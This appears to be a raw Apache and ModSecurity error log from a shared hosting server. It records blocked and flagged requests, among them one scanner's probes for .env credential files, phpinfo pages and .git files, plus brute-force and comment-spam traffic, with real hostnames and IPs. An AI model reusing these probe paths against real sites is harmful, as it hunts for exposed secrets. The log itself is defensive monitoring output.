[Tue May 26 15:05:50.962036 2026] [security2:error] [pid 678998:tid 679034] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/static/js/main.chunk.js"] [unique_id "ahVpdp-Rl4i_pgT-iAduewAAASM"]
[Tue May 26 15:05:51.152589 2026] [security2:error] [pid 678998:tid 679234] [client 196.244.71.27:53031] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVpdp-Rl4i_pgT-iAduegAAAGo"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 15:05:51.784093 2026] [security2:error] [pid 678998:tid 679168] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpd5-Rl4i_pgT-iAduhAAAACg"]
[Tue May 26 15:05:51.934433 2026] [security2:error] [pid 678998:tid 679228] [client 136.243.220.209:59930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpd5-Rl4i_pgT-iAdulQAAAGQ"]
[Tue May 26 15:05:52.762089 2026] [security2:error] [pid 678998:tid 679038] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/environment.js"] [unique_id "ahVpeJ-Rl4i_pgT-iAduqAAARic"]
[Tue May 26 15:05:52.974921 2026] [security2:error] [pid 678998:tid 679042] [remote 74.7.241.58:54474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVpeJ-Rl4i_pgT-iAduqQAAdys"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 15:05:53.559899 2026] [security2:error] [pid 678998:tid 679212] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpeZ-Rl4i_pgT-iAdurwAAAFQ"]
[Tue May 26 15:05:54.582670 2026] [security2:error] [pid 678998:tid 679057] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/scripts/main.js"] [unique_id "ahVpep-Rl4i_pgT-iAdu0wAAIjo"]
[Tue May 26 15:05:55.540879 2026] [security2:error] [pid 678998:tid 679180] [client 136.243.220.209:18897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpe5-Rl4i_pgT-iAdu9wAAADQ"]
[Tue May 26 15:05:55.681243 2026] [security2:error] [pid 678998:tid 679224] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpe5-Rl4i_pgT-iAdu7AAAAGA"]
[Tue May 26 15:05:56.711536 2026] [security2:error] [pid 678998:tid 679255] [client 192.186.159.87:48813] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpfJ-Rl4i_pgT-iAdvBAAAAH8"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:56.775345 2026] [security2:error] [pid 678998:tid 679060] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/main.js"] [unique_id "ahVpfJ-Rl4i_pgT-iAdvBQAAAD0"]
[Tue May 26 15:05:57.099475 2026] [security2:error] [pid 678998:tid 679255] [client 192.186.159.87:48813] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpfJ-Rl4i_pgT-iAdvBAAAAH8"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:57.964672 2026] [security2:error] [pid 678998:tid 679146] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpfZ-Rl4i_pgT-iAdvIAAAABI"]
[Tue May 26 15:05:57.976521 2026] [security2:error] [pid 678998:tid 679156] [client 202.76.143.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpfZ-Rl4i_pgT-iAdvIwAAABw"]
[Tue May 26 15:05:58.181728 2026] [security2:error] [pid 678998:tid 679248] [client 207.46.13.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpfp-Rl4i_pgT-iAdvNwAAAHg"]
[Tue May 26 15:05:58.527949 2026] [security2:error] [pid 678998:tid 679136] [client 192.186.159.82:37993] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpfp-Rl4i_pgT-iAdvPwAAAAg"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:58.555200 2026] [security2:error] [pid 678998:tid 679061] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/_profiler"] [unique_id "ahVpfp-Rl4i_pgT-iAdvSgAAcT4"]
[Tue May 26 15:05:58.899075 2026] [security2:error] [pid 678998:tid 679136] [client 192.186.159.82:37993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpfp-Rl4i_pgT-iAdvPwAAAAg"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:59.513068 2026] [security2:error] [pid 678998:tid 679218] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpf5-Rl4i_pgT-iAdvXQAAAFo"]
[Tue May 26 15:06:00.089357 2026] [security2:error] [pid 678998:tid 679180] [client 136.243.220.209:58522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpgJ-Rl4i_pgT-iAdvfgAAADQ"]
[Tue May 26 15:06:00.409071 2026] [security2:error] [pid 678998:tid 679086] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/_profiler/phpinfo"] [unique_id "ahVpgJ-Rl4i_pgT-iAdvhgAAcVc"]
[Tue May 26 15:06:02.242005 2026] [security2:error] [pid 678998:tid 679130] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpgZ-Rl4i_pgT-iAdvtQAAAAI"]
[Tue May 26 15:06:02.243681 2026] [security2:error] [pid 678998:tid 679088] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVpgp-Rl4i_pgT-iAdvxQAAC1k"]
[Tue May 26 15:06:03.899740 2026] [security2:error] [pid 678998:tid 679172] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpg5-Rl4i_pgT-iAdv8gAAACw"]
[Tue May 26 15:06:04.017050 2026] [security2:error] [pid 678998:tid 679097] [remote 113.190.40.93:56614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVpg5-Rl4i_pgT-iAdv_gAASWI"]
[Tue May 26 15:06:04.041346 2026] [security2:error] [pid 678998:tid 679091] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/phpinfo.php"] [unique_id "ahVphJ-Rl4i_pgT-iAdwAAAAOFw"]
[Tue May 26 15:06:04.532162 2026] [security2:error] [pid 678998:tid 679158] [client 43.172.194.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVphJ-Rl4i_pgT-iAdwCgAAAB4"]
[Tue May 26 15:06:05.889324 2026] [security2:error] [pid 678998:tid 679115] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/info.php"] [unique_id "ahVphZ-Rl4i_pgT-iAdwTAAALnQ"]
[Tue May 26 15:06:06.468052 2026] [security2:error] [pid 678998:tid 679149] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVphZ-Rl4i_pgT-iAdwUQAAABU"]
[Tue May 26 15:06:07.210053 2026] [security2:error] [pid 678998:tid 679230] [client 192.186.159.82:45502] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVph5-Rl4i_pgT-iAdwlgAAAGY"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:07.613847 2026] [security2:error] [pid 678998:tid 679230] [client 192.186.159.82:45502] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVph5-Rl4i_pgT-iAdwlgAAAGY"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:07.729022 2026] [security2:error] [pid 678998:tid 679008] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/pinfo.php"] [unique_id "ahVph5-Rl4i_pgT-iAdwngAAOwk"]
[Tue May 26 15:06:08.281718 2026] [autoindex:error] [pid 678998:tid 679172] [client 43.165.67.31:49416] AH01276: Cannot serve directory /home1/midrie34/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:06:08.613953 2026] [security2:error] [pid 678998:tid 679220] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpiJ-Rl4i_pgT-iAdwpwAAAFw"]
[Tue May 26 15:06:09.554585 2026] [security2:error] [pid 678998:tid 679010] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/i.php"] [unique_id "ahVpiZ-Rl4i_pgT-iAdwywAAAgs"]
[Tue May 26 15:06:09.858243 2026] [security2:error] [pid 678998:tid 679183] [client 192.252.215.5:43615] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVpiZ-Rl4i_pgT-iAdwzAAAADc"], referer: https://www.cagmedya.com/
[Tue May 26 15:06:10.235788 2026] [security2:error] [pid 678998:tid 679193] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpiZ-Rl4i_pgT-iAdw0AAAAEE"]
[Tue May 26 15:06:11.315225 2026] [security2:error] [pid 678998:tid 679068] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/web/.env"] [unique_id "ahVpi5-Rl4i_pgT-iAdxCQAAYkU"]
[Tue May 26 15:06:12.276016 2026] [security2:error] [pid 678998:tid 679153] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpi5-Rl4i_pgT-iAdxFgAAABk"]
[Tue May 26 15:06:13.177368 2026] [security2:error] [pid 678998:tid 679029] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/crm/.env"] [unique_id "ahVpjZ-Rl4i_pgT-iAdxPAAAeR4"]
[Tue May 26 15:06:14.939693 2026] [security2:error] [pid 678998:tid 679032] [remote 147.47.107.157:34658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 157.107.47.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVpjp-Rl4i_pgT-iAdxegAAfiE"]
[Tue May 26 15:06:14.988257 2026] [security2:error] [pid 678998:tid 679027] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/local/.env"] [unique_id "ahVpjp-Rl4i_pgT-iAdxjAAAYRw"]
[Tue May 26 15:06:15.172916 2026] [security2:error] [pid 678998:tid 679159] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpjp-Rl4i_pgT-iAdxfwAAAB8"]
[Tue May 26 15:06:15.939218 2026] [security2:error] [pid 678998:tid 679172] [client 192.186.162.26:55523] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.186.162.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpj5-Rl4i_pgT-iAdxpgAAACw"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:15.939333 2026] [security2:error] [pid 678998:tid 679172] [client 192.186.162.26:55523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpj5-Rl4i_pgT-iAdxpgAAACw"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:16.834421 2026] [security2:error] [pid 678998:tid 679044] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/prod/.env"] [unique_id "ahVpkJ-Rl4i_pgT-iAdxxQAAPC0"]
[Tue May 26 15:06:17.324680 2026] [security2:error] [pid 678998:tid 679184] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpkJ-Rl4i_pgT-iAdxyAAAADg"]
[Tue May 26 15:06:18.649165 2026] [security2:error] [pid 678998:tid 679056] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/vendor/laravel/.env"] [unique_id "ahVpkp-Rl4i_pgT-iAdyGgAAbjk"]
[Tue May 26 15:06:19.931270 2026] [security2:error] [pid 678998:tid 679249] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpk5-Rl4i_pgT-iAdyKwAAAHk"]
[Tue May 26 15:06:20.268665 2026] [security2:error] [pid 678998:tid 679170] [client 192.186.162.26:48292] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.186.162.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVplJ-Rl4i_pgT-iAdyQgAAACo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:20.268818 2026] [security2:error] [pid 678998:tid 679170] [client 192.186.162.26:48292] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVplJ-Rl4i_pgT-iAdyQgAAACo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:20.448898 2026] [security2:error] [pid 678998:tid 679055] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/vendor/.env"] [unique_id "ahVplJ-Rl4i_pgT-iAdyRwAAKTg"]
[Tue May 26 15:06:21.542550 2026] [security2:error] [pid 678998:tid 679133] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVplZ-Rl4i_pgT-iAdyXgAAAAU"]
[Tue May 26 15:06:22.228875 2026] [security2:error] [pid 678998:tid 679084] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/app/config/.env"] [unique_id "ahVplp-Rl4i_pgT-iAdydAAAHFU"]
[Tue May 26 15:06:23.286136 2026] [core:crit] [pid 678998:tid 679177] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:06:23.562560 2026] [core:crit] [pid 678998:tid 679153] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:06:23.830779 2026] [security2:error] [pid 678998:tid 679208] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpl5-Rl4i_pgT-iAdyoQAAAFA"]
[Tue May 26 15:06:24.148978 2026] [security2:error] [pid 678998:tid 679062] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/core/app/.env"] [unique_id "ahVpmJ-Rl4i_pgT-iAdytwAAYj8"]
[Tue May 26 15:06:24.598248 2026] [security2:error] [pid 678998:tid 679170] [client 192.186.162.26:52534] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.186.162.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpmJ-Rl4i_pgT-iAdywgAAACo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:24.598444 2026] [security2:error] [pid 678998:tid 679170] [client 192.186.162.26:52534] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpmJ-Rl4i_pgT-iAdywgAAACo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:25.044129 2026] [core:crit] [pid 678998:tid 679228] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:06:25.318932 2026] [core:crit] [pid 678998:tid 679230] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:06:25.330382 2026] [security2:error] [pid 678998:tid 679133] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpmJ-Rl4i_pgT-iAdy1gAAAAU"]
[Tue May 26 15:06:26.534606 2026] [security2:error] [pid 678998:tid 679096] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.git/info/exclude"] [unique_id "ahVpmp-Rl4i_pgT-iAdzEQAAWmE"]
[Tue May 26 15:06:27.569433 2026] [security2:error] [pid 678998:tid 679242] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpm5-Rl4i_pgT-iAdzKQAAAHI"]
